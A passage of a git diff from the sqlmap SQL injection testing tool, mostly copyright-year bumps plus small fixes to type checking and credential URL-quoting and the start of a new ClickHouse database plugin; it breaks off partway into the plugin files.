--- a/lib/takeover/abstraction.py
+++ b/lib/takeover/abstraction.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/lib/takeover/icmpsh.py b/lib/takeover/icmpsh.py
index be87387be..679a4cd45 100644
--- a/lib/takeover/icmpsh.py
+++ b/lib/takeover/icmpsh.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/lib/takeover/metasploit.py b/lib/takeover/metasploit.py
index b322fc44c..d4a8776b1 100644
--- a/lib/takeover/metasploit.py
+++ b/lib/takeover/metasploit.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/lib/takeover/registry.py b/lib/takeover/registry.py
index e5dcc18c8..a63ec04a2 100644
--- a/lib/takeover/registry.py
+++ b/lib/takeover/registry.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/lib/takeover/udf.py b/lib/takeover/udf.py
index d3b1a21c1..4a53de31d 100644
--- a/lib/takeover/udf.py
+++ b/lib/takeover/udf.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/lib/takeover/web.py b/lib/takeover/web.py
index 93cb79f23..95727407a 100644
--- a/lib/takeover/web.py
+++ b/lib/takeover/web.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/lib/takeover/xp_cmdshell.py b/lib/takeover/xp_cmdshell.py
index 52fea7745..c81375a45 100644
--- a/lib/takeover/xp_cmdshell.py
+++ b/lib/takeover/xp_cmdshell.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/lib/techniques/__init__.py b/lib/techniques/__init__.py
index a5b83a8fa..8476fab2f 100644
--- a/lib/techniques/__init__.py
+++ b/lib/techniques/__init__.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/lib/techniques/blind/__init__.py b/lib/techniques/blind/__init__.py
index a5b83a8fa..8476fab2f 100644
--- a/lib/techniques/blind/__init__.py
+++ b/lib/techniques/blind/__init__.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/lib/techniques/blind/inference.py b/lib/techniques/blind/inference.py
index 70bad65e0..52bea1163 100644
--- a/lib/techniques/blind/inference.py
+++ b/lib/techniques/blind/inference.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
@@ -26,6 +26,7 @@ from lib.core.common import goGoodSamaritan
from lib.core.common import hashDBRetrieve
from lib.core.common import hashDBWrite
from lib.core.common import incrementCounter
+from lib.core.common import isDigit
from lib.core.common import isListLike
from lib.core.common import safeStringFormat
from lib.core.common import singleTimeWarnMessage
@@ -61,6 +62,7 @@ from lib.request.connect import Connect as Request
from lib.utils.progress import ProgressBar
from lib.utils.safe2bin import safecharencode
from lib.utils.xrange import xrange
+from thirdparty import six
def bisection(payload, expression, length=None, charsetType=None, firstChar=None, lastChar=None, dump=False):
"""
@@ -163,7 +165,7 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
else:
expressionUnescaped = unescaper.escape(expression)
- if hasattr(length, "isdigit") and length.isdigit() or isinstance(length, int):
+ if isinstance(length, six.string_types) and isDigit(length) or isinstance(length, int):
length = int(length)
else:
length = None
diff --git a/lib/techniques/dns/__init__.py b/lib/techniques/dns/__init__.py
index a5b83a8fa..8476fab2f 100644
--- a/lib/techniques/dns/__init__.py
+++ b/lib/techniques/dns/__init__.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/lib/techniques/dns/test.py b/lib/techniques/dns/test.py
index 7fe59ab60..c0c16679a 100644
--- a/lib/techniques/dns/test.py
+++ b/lib/techniques/dns/test.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/lib/techniques/dns/use.py b/lib/techniques/dns/use.py
index 5c9d09dc9..d2c474fdc 100644
--- a/lib/techniques/dns/use.py
+++ b/lib/techniques/dns/use.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/lib/techniques/error/__init__.py b/lib/techniques/error/__init__.py
index a5b83a8fa..8476fab2f 100644
--- a/lib/techniques/error/__init__.py
+++ b/lib/techniques/error/__init__.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/lib/techniques/error/use.py b/lib/techniques/error/use.py
index 078c04b4e..343733dd2 100644
--- a/lib/techniques/error/use.py
+++ b/lib/techniques/error/use.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/lib/techniques/union/__init__.py b/lib/techniques/union/__init__.py
index a5b83a8fa..8476fab2f 100644
--- a/lib/techniques/union/__init__.py
+++ b/lib/techniques/union/__init__.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/lib/techniques/union/test.py b/lib/techniques/union/test.py
index 64b5be0aa..c7a3f5948 100644
--- a/lib/techniques/union/test.py
+++ b/lib/techniques/union/test.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/lib/techniques/union/use.py b/lib/techniques/union/use.py
index 868cae4ef..ef550d8da 100644
--- a/lib/techniques/union/use.py
+++ b/lib/techniques/union/use.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/lib/utils/__init__.py b/lib/utils/__init__.py
index a5b83a8fa..8476fab2f 100644
--- a/lib/utils/__init__.py
+++ b/lib/utils/__init__.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/lib/utils/api.py b/lib/utils/api.py
index 6fa8c0ab2..2a394f382 100644
--- a/lib/utils/api.py
+++ b/lib/utils/api.py
@@ -2,7 +2,7 @@
# -*- coding: utf-8 -*-
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/lib/utils/brute.py b/lib/utils/brute.py
index f9fe08089..905e5d241 100644
--- a/lib/utils/brute.py
+++ b/lib/utils/brute.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/lib/utils/crawler.py b/lib/utils/crawler.py
index 021514541..2d9070713 100644
--- a/lib/utils/crawler.py
+++ b/lib/utils/crawler.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/lib/utils/deps.py b/lib/utils/deps.py
index 846f2637f..c13e66a28 100644
--- a/lib/utils/deps.py
+++ b/lib/utils/deps.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
@@ -58,6 +58,8 @@ def checkDependencies():
__import__("mimerpy")
elif dbmsName == DBMS.CUBRID:
__import__("CUBRIDdb")
+ elif dbmsName == DBMS.CLICKHOUSE:
+ __import__("clickhouse_connect")
except:
warnMsg = "sqlmap requires '%s' third-party library " % data[1]
warnMsg += "in order to directly connect to the DBMS "
diff --git a/lib/utils/getch.py b/lib/utils/getch.py
index 5f0f61d57..347fd7e53 100644
--- a/lib/utils/getch.py
+++ b/lib/utils/getch.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/lib/utils/har.py b/lib/utils/har.py
index c7bbc6743..bcea7b001 100644
--- a/lib/utils/har.py
+++ b/lib/utils/har.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/lib/utils/hash.py b/lib/utils/hash.py
index b716a54fa..4a013338b 100644
--- a/lib/utils/hash.py
+++ b/lib/utils/hash.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/lib/utils/hashdb.py b/lib/utils/hashdb.py
index 128720dd1..10cf2dcc9 100644
--- a/lib/utils/hashdb.py
+++ b/lib/utils/hashdb.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/lib/utils/httpd.py b/lib/utils/httpd.py
index 546cca4de..f5820a600 100644
--- a/lib/utils/httpd.py
+++ b/lib/utils/httpd.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/lib/utils/pivotdumptable.py b/lib/utils/pivotdumptable.py
index a36ab80e8..008a33c59 100644
--- a/lib/utils/pivotdumptable.py
+++ b/lib/utils/pivotdumptable.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/lib/utils/progress.py b/lib/utils/progress.py
index 43aa2d0fc..9e906326a 100644
--- a/lib/utils/progress.py
+++ b/lib/utils/progress.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/lib/utils/purge.py b/lib/utils/purge.py
index 327261469..e89895eba 100644
--- a/lib/utils/purge.py
+++ b/lib/utils/purge.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/lib/utils/safe2bin.py b/lib/utils/safe2bin.py
index 2d2ae4f2d..15ba36965 100644
--- a/lib/utils/safe2bin.py
+++ b/lib/utils/safe2bin.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/lib/utils/search.py b/lib/utils/search.py
index 2b4a12b97..5ae11a10c 100644
--- a/lib/utils/search.py
+++ b/lib/utils/search.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/lib/utils/sqlalchemy.py b/lib/utils/sqlalchemy.py
index be67316d8..f1bc0d99d 100644
--- a/lib/utils/sqlalchemy.py
+++ b/lib/utils/sqlalchemy.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
@@ -21,7 +21,7 @@ try:
if hasattr(module, "dialects"):
_sqlalchemy = module
warnings.simplefilter(action="ignore", category=_sqlalchemy.exc.SAWarning)
-except ImportError:
+except:
pass
finally:
sys.path = _path
@@ -39,6 +39,7 @@ from lib.core.exception import SqlmapFilePathException
from lib.core.exception import SqlmapMissingDependence
from plugins.generic.connector import Connector as GenericConnector
from thirdparty import six
+from thirdparty.six.moves import urllib as _urllib
def getSafeExString(ex, encoding=None): # Cross-referenced function
raise NotImplementedError
@@ -50,6 +51,14 @@ class SQLAlchemy(GenericConnector):
self.dialect = dialect
self.address = conf.direct
+ if conf.dbmsUser:
+ self.address = self.address.replace("'%s':" % conf.dbmsUser, "%s:" % _urllib.parse.quote(conf.dbmsUser))
+ self.address = self.address.replace("%s:" % conf.dbmsUser, "%s:" % _urllib.parse.quote(conf.dbmsUser))
+
+ if conf.dbmsPass:
+ self.address = self.address.replace(":'%s'@" % conf.dbmsPass, ":%s@" % _urllib.parse.quote(conf.dbmsPass))
+ self.address = self.address.replace(":%s@" % conf.dbmsPass, ":%s@" % _urllib.parse.quote(conf.dbmsPass))
+
if self.dialect:
self.address = re.sub(r"\A.+://", "%s://" % self.dialect, self.address)
diff --git a/lib/utils/timeout.py b/lib/utils/timeout.py
index abafa2fe0..9551cfe5d 100644
--- a/lib/utils/timeout.py
+++ b/lib/utils/timeout.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/lib/utils/versioncheck.py b/lib/utils/versioncheck.py
index 59547f789..7dd85e1b3 100644
--- a/lib/utils/versioncheck.py
+++ b/lib/utils/versioncheck.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/lib/utils/xrange.py b/lib/utils/xrange.py
index 3063ecf9b..d4065f00d 100644
--- a/lib/utils/xrange.py
+++ b/lib/utils/xrange.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/__init__.py b/plugins/__init__.py
index a5b83a8fa..8476fab2f 100644
--- a/plugins/__init__.py
+++ b/plugins/__init__.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/__init__.py b/plugins/dbms/__init__.py
index a5b83a8fa..8476fab2f 100644
--- a/plugins/dbms/__init__.py
+++ b/plugins/dbms/__init__.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/access/__init__.py b/plugins/dbms/access/__init__.py
index f9b52a951..37ec1e2b8 100644
--- a/plugins/dbms/access/__init__.py
+++ b/plugins/dbms/access/__init__.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/access/connector.py b/plugins/dbms/access/connector.py
index 6359d422d..492bc5d7e 100644
--- a/plugins/dbms/access/connector.py
+++ b/plugins/dbms/access/connector.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/access/enumeration.py b/plugins/dbms/access/enumeration.py
index 04a050a42..9d6484aa9 100644
--- a/plugins/dbms/access/enumeration.py
+++ b/plugins/dbms/access/enumeration.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/access/filesystem.py b/plugins/dbms/access/filesystem.py
index 6204a4074..b272956f9 100644
--- a/plugins/dbms/access/filesystem.py
+++ b/plugins/dbms/access/filesystem.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/access/fingerprint.py b/plugins/dbms/access/fingerprint.py
index e1227bef5..c6226bfdf 100644
--- a/plugins/dbms/access/fingerprint.py
+++ b/plugins/dbms/access/fingerprint.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/access/syntax.py b/plugins/dbms/access/syntax.py
index 4ad9b1d5e..542f215d4 100644
--- a/plugins/dbms/access/syntax.py
+++ b/plugins/dbms/access/syntax.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/access/takeover.py b/plugins/dbms/access/takeover.py
index ab9fbb808..b2c52b490 100644
--- a/plugins/dbms/access/takeover.py
+++ b/plugins/dbms/access/takeover.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/altibase/__init__.py b/plugins/dbms/altibase/__init__.py
index 90d07eeb9..63ee13176 100644
--- a/plugins/dbms/altibase/__init__.py
+++ b/plugins/dbms/altibase/__init__.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/altibase/connector.py b/plugins/dbms/altibase/connector.py
index 176f709b5..e19ad4bfb 100644
--- a/plugins/dbms/altibase/connector.py
+++ b/plugins/dbms/altibase/connector.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/altibase/enumeration.py b/plugins/dbms/altibase/enumeration.py
index 0628c8eeb..e565b49c4 100644
--- a/plugins/dbms/altibase/enumeration.py
+++ b/plugins/dbms/altibase/enumeration.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/altibase/filesystem.py b/plugins/dbms/altibase/filesystem.py
index 2ff16d48d..bf4d5c5ba 100644
--- a/plugins/dbms/altibase/filesystem.py
+++ b/plugins/dbms/altibase/filesystem.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/altibase/fingerprint.py b/plugins/dbms/altibase/fingerprint.py
index fec86354f..eb471a724 100644
--- a/plugins/dbms/altibase/fingerprint.py
+++ b/plugins/dbms/altibase/fingerprint.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/altibase/syntax.py b/plugins/dbms/altibase/syntax.py
index 51d87d212..b6b6c633d 100644
--- a/plugins/dbms/altibase/syntax.py
+++ b/plugins/dbms/altibase/syntax.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/altibase/takeover.py b/plugins/dbms/altibase/takeover.py
index 876c40a55..6edc833ba 100644
--- a/plugins/dbms/altibase/takeover.py
+++ b/plugins/dbms/altibase/takeover.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/cache/__init__.py b/plugins/dbms/cache/__init__.py
index dbe98e32d..f9409fbc7 100644
--- a/plugins/dbms/cache/__init__.py
+++ b/plugins/dbms/cache/__init__.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/cache/connector.py b/plugins/dbms/cache/connector.py
index 03706f091..000db10fc 100644
--- a/plugins/dbms/cache/connector.py
+++ b/plugins/dbms/cache/connector.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/cache/enumeration.py b/plugins/dbms/cache/enumeration.py
index 56e580f00..bc81558c4 100644
--- a/plugins/dbms/cache/enumeration.py
+++ b/plugins/dbms/cache/enumeration.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/cache/filesystem.py b/plugins/dbms/cache/filesystem.py
index 2ff16d48d..bf4d5c5ba 100644
--- a/plugins/dbms/cache/filesystem.py
+++ b/plugins/dbms/cache/filesystem.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/cache/fingerprint.py b/plugins/dbms/cache/fingerprint.py
index d22652934..feca88a5b 100644
--- a/plugins/dbms/cache/fingerprint.py
+++ b/plugins/dbms/cache/fingerprint.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/cache/syntax.py b/plugins/dbms/cache/syntax.py
index ec33fa6f7..6ee812152 100644
--- a/plugins/dbms/cache/syntax.py
+++ b/plugins/dbms/cache/syntax.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/cache/takeover.py b/plugins/dbms/cache/takeover.py
index 681a2355c..cf933aee3 100644
--- a/plugins/dbms/cache/takeover.py
+++ b/plugins/dbms/cache/takeover.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/clickhouse/__init__.py b/plugins/dbms/clickhouse/__init__.py
new file mode 100755
index 000000000..a4a131442
--- /dev/null
+++ b/plugins/dbms/clickhouse/__init__.py
@@ -0,0 +1,30 @@
+#!/usr/bin/env python
+
+"""
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
+See the file 'LICENSE' for copying permission
+"""
+
+from lib.core.enums import DBMS
+from lib.core.settings import CLICKHOUSE_SYSTEM_DBS
+from lib.core.unescaper import unescaper
+
+from plugins.dbms.clickhouse.enumeration import Enumeration
+from plugins.dbms.clickhouse.filesystem import Filesystem
+from plugins.dbms.clickhouse.fingerprint import Fingerprint
+from plugins.dbms.clickhouse.syntax import Syntax
+from plugins.dbms.clickhouse.takeover import Takeover
+from plugins.generic.misc import Miscellaneous
+
+class ClickHouseMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover):
+ """
+ This class defines ClickHouse methods
+ """
+
+ def __init__(self):
+ self.excludeDbsList = CLICKHOUSE_SYSTEM_DBS
+
+ for cls in self.__class__.__bases__:
+ cls.__init__(self)
+
+ unescaper[DBMS.CLICKHOUSE] = Syntax.escape
diff --git a/plugins/dbms/clickhouse/connector.py b/plugins/dbms/clickhouse/connector.py
new file mode 100755
index 000000000..b58d11357
--- /dev/null
+++ b/plugins/dbms/clickhouse/connector.py
@@ -0,0 +1,11 @@
+#!/usr/bin/env python
+
+"""
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
+See the file 'LICENSE' for copying permission
+"""
+
+from plugins.generic.connector import Connector as GenericConnector
+
+class Connector(GenericConnector):
+ pass
diff --git a/plugins/dbms/clickhouse/enumeration.py b/plugins/dbms/clickhouse/enumeration.py
new file mode 100755
index 000000000..d4984b8c7
--- /dev/null
+++ b/plugins/dbms/clickhouse/enumeration.py
@@ -0,0 +1,22 @@
+#!/usr/bin/env python
+
+"""
